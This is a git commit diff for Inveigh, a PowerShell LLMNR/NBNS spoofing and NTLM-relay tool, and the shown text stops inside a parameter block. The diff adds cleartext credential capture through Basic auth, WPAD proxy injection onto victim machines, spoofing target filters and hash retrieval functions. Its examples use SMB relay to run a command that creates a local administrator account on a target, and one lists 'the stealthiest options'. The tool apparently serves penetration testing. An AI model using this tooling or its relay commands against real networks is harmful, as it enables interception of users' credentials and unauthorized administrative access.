diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2016-01-12 11:01:35 -0500 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2016-01-12 11:01:35 -0500 |
| commit | 5cbec815b38e6efe0ea5ad2d8706506ddd7e398e (patch) | |
| tree | b57bbec707e5d20acd31a9984179ce7f6a189e2c | |
| parent | a4fce4bbfc0960d50a7df8244dde05d9de6ed9ab (diff) | |
| download | Inveigh-5cbec815b38e6efe0ea5ad2d8706506ddd7e398e.tar.gz Inveigh-5cbec815b38e6efe0ea5ad2d8706506ddd7e398e.zip | |
Spoofer, HTTP/HTTPS, and WPAD additions/changes1.0.0
LLMNR/NBNS spoofer:
SpooferIPsReply/SpooferIPsIgnore - These parameters provide granular
control over what systems to respond to when spoofing.
SpooferHostsReply/SpooferHostsIgnore - These parameters provide granular
control over what requested hostnames to respond to when spoofing. Note
that SpooferHostsAccept replaces SpoofList.
SpooferRepeat - This parameter replaces Repeat in order to sync the
parameter name with the prefix used for other spoofer parameters.
HTTP/HTTPS Listener:
HTTPAuth - This parameter provides the ability to set the HTTP/HTTPS
non-WPAD auth to NTLM, Basic, or Anonymous. Basic authentication can be
used to capture cleartext credentials (thanks @xorrior!).
HTTPBasicRealm - Set a realm name if Basic auth is enabled.
HTTPDir/HTTPDefaultFile/HTTPDefaultEXE/HTTPResponse - These parameters
provide control over the content served by the listener.
HTTPSCertThumbprint - This parameter provides the ability to more easily
set the thumbprint for custom certs.
HTTP/HTTPS requests are now reported and/or logged.
WPAD:
WPADIP/WPADPort - These parameters provide the ability to configure a
proxy server on victim systems through WPAD.
WPADResponse - These parameters provide the ability to configure a
custom wpad.dat response rather than the basic one used by WPADIP and
WPADPort.
WPADAuth - This parameter provides the ability to set the HTTP/HTTPS
WPAD auth to NTLM, Basic, or Anonymous. Basic authentication can be used
to capture cleartext credentials (thanks @xorrior!). Note that this
parameter replaces ForceWPADAuth.
Miscellaneous:
Get-InveighCleartext - Gets all captured cleartext credentials.
Inspect - This switch parameter serves as an easier way to inspect
LLMNR/NBNS traffic. If -Inspect is added to the command line, LLMNR,
NBNS, HTTP, HTTPS, and SMB are disabled.
| -rw-r--r-- | README.md | 14 | ||||
| -rw-r--r-- | Scripts/Inveigh-Relay.ps1 | 108 | ||||
| -rw-r--r-- | Scripts/Inveigh.ps1 | 537 |
3 files changed, 492 insertions, 167 deletions
@@ -37,7 +37,7 @@ To load and execute with one line: Import-Module ./Inveigh.ps1;Invoke-Inveigh To execute with features enabled/disabled: -Invoke-Inveigh -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path' +Invoke-Inveigh -IP 'local IP' -SpooferIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path' To execute with SMB relay enabled through Invoke-Inveigh: Invoke-Inveigh -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" @@ -51,6 +51,7 @@ Use 'Get-Help -parameter * Invoke-Inveigh' for a full list of parameters Invoke-Inveigh - Start Inveigh with or without parameters Invoke-InveighRelay - SMB relay function Get-Inveigh - Get queued console output +Get-InveighCleartext - Get all captured cleartext credentials Get-InveighLog - Get log entries Get-InveighNTLM - Get all captured challenge/response hashes Get-InveighNTLMv1 - Get captured NTLMv1 challenge/response hashes @@ -60,9 +61,18 @@ Watch-Inveigh - Enable real time console output Clear-Inveigh - Clear Inveigh data from memory Stop-Inveigh - Stop all running Inveigh functions +# Included In +PowerShell Empire - https://github.com/PowerShellEmpire/Empire +PS>Attack - https://github.com/jaredhaight/psattack + +# Special Thanks +Anyone that posted .net packet sniffing examples. +Responder - https://github.com/SpiderLabs/Responder +Impacket - https://github.com/CoreSecurity/impacket + # Screenshots Invoke-Inveigh execution with real time console and file output enabled - + Retrieval of captured NTLM2 challenge/response hashes with Get-InveighNTLMv2  diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1 index 848a683..47a487c 100644 --- a/Scripts/Inveigh-Relay.ps1 +++ b/Scripts/Inveigh-Relay.ps1 @@ -8,21 +8,24 @@ Invoke-InveighRelay is the main Inveigh SMB relay function. Invoke-InveighRelay Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB relay with psexec style command execution. .PARAMETER HTTP -Default = Enabled: Enable/Disable HTTP challenge/response capture. +Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. .PARAMETER HTTPS -Default = Disabled: Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. +Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. +.PARAMETER HTTPSCertThumbprint +Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be inveigh.pfx. + .PARAMETER Challenge Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. .PARAMETER MachineAccounts -Default = Disabled: Enable/Disable showing NTLM challenge/response captures from machine accounts. +Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -.PARAMETER ForceWPADAuth -Default = Enabled: Matches Responder option to Enable/Disable authentication for wpad.dat GET requests. Disabling can prevent browser login prompts. +.PARAMETER WPADAuth +Default = NTLM: (Anonymous,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. .PARAMETER SMBRelayTarget IP address of system to target for SMB relay. @@ -34,35 +37,35 @@ Command to execute on SMB relay target. Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. .PARAMETER SMBRelayAutoDisable -Default = Enable: Automaticaly disable SMB relay after a successful command execution on target. +Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. .PARAMETER SMBRelayNetworkTimeout -Default = No Timeout: Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent. +Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent. .PARAMETER ConsoleOutput -Default = Disabled: Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. +Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. .PARAMETER FileOutput -Default = Disabled: Enable/Disable real time file output. +Default = Disabled: (Y/N) Enable/Disable real time file output. .PARAMETER StatusOutput -Default = Enabled: Enable/Disable statup and shutdown messages. +Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. .PARAMETER OutputStreamOnly Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. .PARAMETER OutputDir -Default = Working Directory: Set an output directory for log and capture files. +Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled. .PARAMETER ShowHelp -Default = Enabled: Enable/Disable the help messages at startup. +Default = Enabled: (Y/N) Enable/Disable the help messages at startup. .PARAMETER Tool -Default = 0: Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire +Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire .EXAMPLE -Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2015 /add && net localgroup administrators Dave /add" +Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Winter2016 /add && net localgroup administrators Dave /add" Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay target. .EXAMPLE @@ -77,24 +80,29 @@ https://github.com/mubix/post-exploitation/blob/master/scripts/mass_mimikatz/pow https://github.com/Kevin-Robertson/Inveigh #> + +# Default parameter values can be modified in this section param ( [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTP="Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTPS="N", - [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ConsoleOutput="N", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$FileOutput="N", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$StatusOutput="Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$OutputStreamOnly="N", - [parameter(Mandatory=$true)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SMBRelayTarget ="", - [parameter(Mandatory=$false)][array]$SMBRelayUsernames, - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelayAutoDisable="Y", - [parameter(Mandatory=$false)][int]$SMBRelayNetworkTimeout="", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$MachineAccounts="N", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$OutputDir="", - [parameter(Mandatory=$true)][string]$SMBRelayCommand = "", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelayAutoDisable="Y", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][string]$WPADAuth="NTLM", [parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Tool="0", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y" + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$OutputDir="", + [parameter(Mandatory=$true)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SMBRelayTarget ="", + [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="", + [parameter(Mandatory=$false)][array]$SMBRelayUsernames="", + [parameter(Mandatory=$false)][int]$SMBRelayNetworkTimeout="", + [parameter(Mandatory=$true)][string]$SMBRelayCommand = "", + [parameter(Mandatory=$false)][string]$HTTPSCertThumbprint="76a49fd27011cf4311fb6914c904c90a89f3e4b2", + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter ) if ($invalid_parameter) @@ -106,8 +114,7 @@ if(!$SMBRelayTarget) { Throw "You must specify an -SMBRelayTarget if enabling -SMBRelay" } - -if(!$SMBRelayCommand) +elseif(!$SMBRelayCommand) { Throw "You must specify an -SMBRelayCommand if enabling -SMBRelay" } @@ -131,6 +138,11 @@ if(!$inveigh) $inveigh.SMBRelay_failed_list = @() } +if($inveigh.relay_running) +{ + Throw "Invoke-InveighRelay is already running, use Stop-Inveigh" +} + if($inveigh.HTTP_listener.IsListening) { $inveigh.HTTP_listener.Stop() @@ -144,7 +156,7 @@ if(!$inveigh.running) $inveigh.log_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList - $inveigh.certificate_thumbprint = "76a49fd27011cf4311fb6914c904c90a89f3e4b2" + $inveigh.certificate_thumbprint = $HTTPSCertThumbprint $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList $inveigh.console_output = $false $inveigh.console_input = $true @@ -152,7 +164,7 @@ if(!$inveigh.running) $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" - $Inveigh.challenge = $Challenge + $inveigh.challenge = $Challenge } $inveigh.relay_running = $true @@ -254,14 +266,7 @@ if(!$inveigh.running) $inveigh.status_queue.add("Ignoring Machine Accounts")|Out-Null } - if($ForceWPADAuth -eq 'y') - { - $inveigh.status_queue.add("Force WPAD Authentication Enabled")|Out-Null - } - else - { - $inveigh.status_queue.add("Force WPAD Authentication Disabled")|Out-Null - } + $inveigh.status_queue.add("Force WPAD Authentication = $WPADAuth")|Out-Null if($ConsoleOutput -eq 'y') { @@ -295,17 +300,15 @@ if(!$inveigh.running) $inveigh.status_queue.add("SMB Relay Enabled") |Out-Null $inveigh.status_queue.add("SMB Relay Target = $SMBRelayTarget")|Out-Null -if($SMBRelayUsernames.Count -gt 0) +if($SMBRelayUsernames) { - $SMBRelayUsernames_output = $SMBRelayUsernames -join "," - if($SMBRelayUsernames.Count -eq 1) { - $inveigh.status_queue.add("SMB Relay Username = $SMBRelayUsernames_output")|Out-Null + $inveigh.status_queue.add("SMB Relay Username = " + $SMBRelayUsernames -join ",")|Out-Null } else { - $inveigh.status_queue.add("SMB Relay Usernames = $SMBRelayUsernames_output")|Out-Null + $inveigh.status_queue.add("SMB Relay Usernames = " + $SMBRelayUsernames -join ",")|Out-Null } } @@ -907,7 +910,7 @@ $SMB_relay_execute_scriptblock = # HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener $HTTP_scriptblock = { - param ($SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$MachineAccounts,$ForceWPADAuth) + param ($SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$MachineAccounts,$WPADAuth) Function NTLMChallengeBase64 { @@ -968,8 +971,7 @@ $HTTP_scriptblock = $HTTP_type = "HTTP" } - - if (($inveigh.request.RawUrl -match '/wpad.dat') -and ($ForceWPADAuth -eq 'n')) + if (($inveigh.request.RawUrl -match '/wpad.dat') -and ($WPADAuth -eq 'Anonymous')) { $inveigh.response.StatusCode = 200 } @@ -988,6 +990,9 @@ $HTTP_scriptblock = if ($HTTP_request_bytes[8] -eq 1) { + $inveigh.console_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address) + $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)]) + if(($inveigh.SMB_relay) -and ($inveigh.SMB_relay_active_step -eq 0) -and ($inveigh.request.RemoteEndpoint.Address -ne $SMBRelayTarget)) { $inveigh.SMB_relay_active_step = 1 @@ -1100,7 +1105,7 @@ $HTTP_scriptblock = } } - if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.repeat)) + if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat)) { $inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address } @@ -1126,7 +1131,7 @@ $HTTP_scriptblock = } - if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.repeat)) + if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat)) { $inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address } @@ -1270,7 +1275,7 @@ Function HTTPListener() $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument( $SMBRelayTarget).AddArgument($SMBRelayCommand).AddArgument($SMBRelayUsernames).AddArgument( $SMBRelayAutoDisable).AddArgument($SMBRelayNetworkTimeout).AddArgument( - $MachineAccounts).AddArgument($ForceWPADAuth) > $null + $MachineAccounts).AddArgument($WPADAuth) > $null $HTTP_handle = $HTTP_powershell.BeginInvoke() } @@ -1526,11 +1531,11 @@ Function Get-InveighNTLMv1 Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes. .PARAMETER Unique - Default = Disabled: Enable/Disable displaying only the first captured challenge/response for each unique account. + Display only the first captured challenge/response for each unique account. #> param ( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$Unique="N", + [parameter(Mandatory=$false)][switch]$Unique, [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter ) @@ -1539,7 +1544,7 @@ Function Get-InveighNTLMv1 throw "$($invalid_parameter) is not a valid parameter." } - if($Unique -eq 'y') + if($Unique) { $inveigh.NTLMv1_list.sort() @@ -1568,11 +1573,11 @@ Function Get-InveighNTLMv2 Get-InveighNTLMv2 will get captured NTLMv1 challenge/response hashes. .PARAMETER Unique - Default = Disabled: Enable/Disable displaying only the first captured challenge/response for each unique account. + Display only the first captured challenge/response for each unique account. #> param ( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$Unique="N", + [parameter(Mandatory=$false)][switch]$Unique, [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter ) @@ -1581,7 +1586,7 @@ Function Get-InveighNTLMv2 throw "$($invalid_parameter) is not a valid parameter." } - if($Unique -eq 'y') + if($Unique) { $inveigh.NTLMv2_list.sort() @@ -1618,6 +1623,7 @@ Function Get-InveighStats .SYNOPSIS Get-InveighLog will get log. #> + Write-Output("Total Cleartext Captures = " + $inveigh.cleartext_list.count) Write-Output("Total NTLMv1 Captures = " + $inveigh.NTLMv1_list.count) Write-Output("Total NTLMv2 Captures = " + $inveigh.NTLMv2_list.count) } diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1 index 3112a75..5bdf528 100644 --- a/Scripts/Inveigh.ps1 +++ b/Scripts/Inveigh.ps1 @@ -14,43 +14,82 @@ Specify a specific local IP address for listening. This IP address will also be .PARAMETER SpooferIP Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host. +.PARAMETER SpooferHostsReply +Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferHostsIgnore +Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferIPsReply +Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferIPsIgnore +Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferRepeat +Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. + .PARAMETER LLMNR -Default = Enabled: Enable/Disable LLMNR spoofing. +Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing. .PARAMETER NBNS -Default = Disabled: Enable/Disable NBNS spoofing. +Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. .PARAMETER NBNSTypes Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name -.PARAMETER Repeat -Default = Enabled: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. - -.PARAMETER SpoofList -Default = All: Comma separated list of hostnames to spoof with LLMNR and NBNS. - .PARAMETER HTTP -Default = Enabled: Enable/Disable HTTP challenge/response capture. +Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. .PARAMETER HTTPS -Default = Disabled: Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. +Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. +.PARAMETER HTTPAuth +Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. + +.PARAMETER HTTPBasicRealm +Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. + +.PARAMETER HTTPDir +Specify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener. This parameter will not be used if HTTPResponse is set. + +.PARAMETER HTTPDefaultFile +Specify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests. + +.PARAMETER HTTPDefaultEXE +Specify an EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. + +.PARAMETER HTTPResponse +Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. + +.PARAMETER WPADAuth +Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. + +.PARAMETER HTTPSCertThumbprint +Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named inveigh.pfx. + +.PARAMETER WPADIP +Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. + +.PARAMETER WPADPort +Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. + +.PARAMETER WPADResponse +Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. + .PARAMETER SMB -Default = Enabled: Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. -Block TCP ports 445/139 if you need to prevent login requests from being processed by the Inveigh host. +Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. +Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host. .PARAMETER Challenge -Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. +Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. .PARAMETER MachineAccounts -Default = Disabled: Enable/Disable showing NTLM challenge/response captures from machine accounts. - -.PARAMETER ForceWPADAuth -Default = Enabled: Matches Responder option to Enable/Disable authentication for wpad.dat GET requests. Disabling can prevent browser login prompts. +Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. .PARAMETER SMBRelay -Default = Disabled: Enable/Disable SMB relay. +Default = Disabled: (Y/N) Enable/Disable SMB relay. Note that Inveigh-Relay.ps1 must be loaded into memory. .PARAMETER SMBRelayTarget IP address of system to target for SMB relay. @@ -62,35 +101,38 @@ Command to execute on SMB relay target. Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. .PARAMETER SMBRelayAutoDisable -Default = Enable: Automaticaly disable SMB relay after a successful command execution on target. +Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. .PARAMETER SMBRelayNetworkTimeout -Default = No Timeout: Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent. +Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent. .PARAMETER ConsoleOutput -Default = Disabled: Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. +Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. .PARAMETER FileOutput -Default = Disabled: Enable/Disable real time file output. +Default = Disabled: (Y/N) Enable/Disable real time file output. .PARAMETER StatusOutput -Default = Enabled: Enable/Disable statup and shutdown messages. +Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. .PARAMETER OutputStreamOnly -Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. +Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. .PARAMETER OutputDir -Default = Working Directory: Set an output directory for log and capture files. +Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled. .PARAMETER ShowHelp -Default = Enabled: Enable/Disable the help messages at startup. +Default = Enabled: (Y/N) Enable/Disable the help messages at startup. .PARAMETER RunTime -Set the run time duration in minutes. +(Integer) Set the run time duration in minutes. + +.PARAMETER Inspect +(Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic. .PARAMETER Tool -Default = 0: Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire +Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire .EXAMPLE Import-Module .\Inveigh.psd1;Invoke-Inveigh @@ -105,11 +147,14 @@ Invoke-Inveigh -IP 192.168.1.10 -HTTP N Execute specifying a specific local listening/spoofing IP and disabling HTTP challenge/response. .EXAMPLE -Invoke-Inveigh -Repeat N -ForceWPADAuth N -SpoofList host1,host2 +Invoke-Inveigh -Repeat N -WPADAuth Anonymous -SpooferHostsReply host1,host2 -SpooferIPsReply 192.168.2.75,192.168.2.76 Execute with the stealthiest options. +Invoke-Inveigh -Inspect +Execute with LLMNR, NBNS, SMB, HTTP, and HTTPS disabled in order to only inpect LLMNR/NBNS traffic. + .EXAMPLE -Invoke-Inveigh -HTTP N -LLMNR N +Invoke-Inveigh -HTTP N -LLMNR N -NBNS N Execute with LLMNR/NBNS spoofing disabled and challenge/response capture over SMB only. This may be useful for capturing non-Kerberos authentication attempts on a file server. .EXAMPLE @@ -117,7 +162,11 @@ Invoke-Inveigh -IP 192.168.1.10 -SpooferIP 192.168.2.50 -HTTP N Execute specifying a specific local listening IP and a LLMNR/NBNS spoofing IP on another subnet. This may be useful for sending traffic to a controlled Linux system on another subnet. .EXAMPLE -Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2015 /add && net localgroup administrators Dave /add" +Invoke-Inveigh -HTTPResponse '<html><head><meta http-equiv="refresh" content="0; url=https://duckduckgo.com/"></head></html>' +Execute specifying an HTTP redirect response. + +.EXAMPLE +Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Winter2016 /add && net localgroup administrators Dave /add" Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay target. .EXAMPLE @@ -139,43 +188,57 @@ https://github.com/mubix/post-exploitation/blob/master/scripts/mass_mimikatz/pow 8. Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS. 9. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system. 10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns. -11. SMB relay support is experimental at this point, use caution if employing on a pen test. .LINK https://github.com/Kevin-Robertson/Inveigh + #> -# Default parameter values can be modified below +# Default parameter values can be modified in this section param ( - [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$IP = "", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SpooferIP = "", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTP="Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTPS="N", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMB="Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$LLMNR="Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$NBNS="N", - [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][array]$NBNSTypes=@("00","20"), - [parameter(Mandatory=$false)][array]$SpoofList="", - [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelay="N", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SMBRelayTarget ="", - [parameter(Mandatory=$false)][array]$SMBRelayUsernames, - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelayAutoDisable="Y", - [parameter(Mandatory=$false)][int]$SMBRelayNetworkTimeout="", - [parameter(Mandatory=$false)][string]$SMBRelayCommand = "", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$Repeat="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ForceWPADAuth="Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SpooferRepeat="Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ConsoleOutput="N", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$FileOutput="N", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$StatusOutput="Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$OutputStreamOnly="N", [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$MachineAccounts="N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelay="N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelayAutoDisable="Y", + [parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Tool="0", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][string]$HTTPAuth="NTLM", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][string]$WPADAuth="NTLM", + [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][array]$NBNSTypes=@("00","20"), + 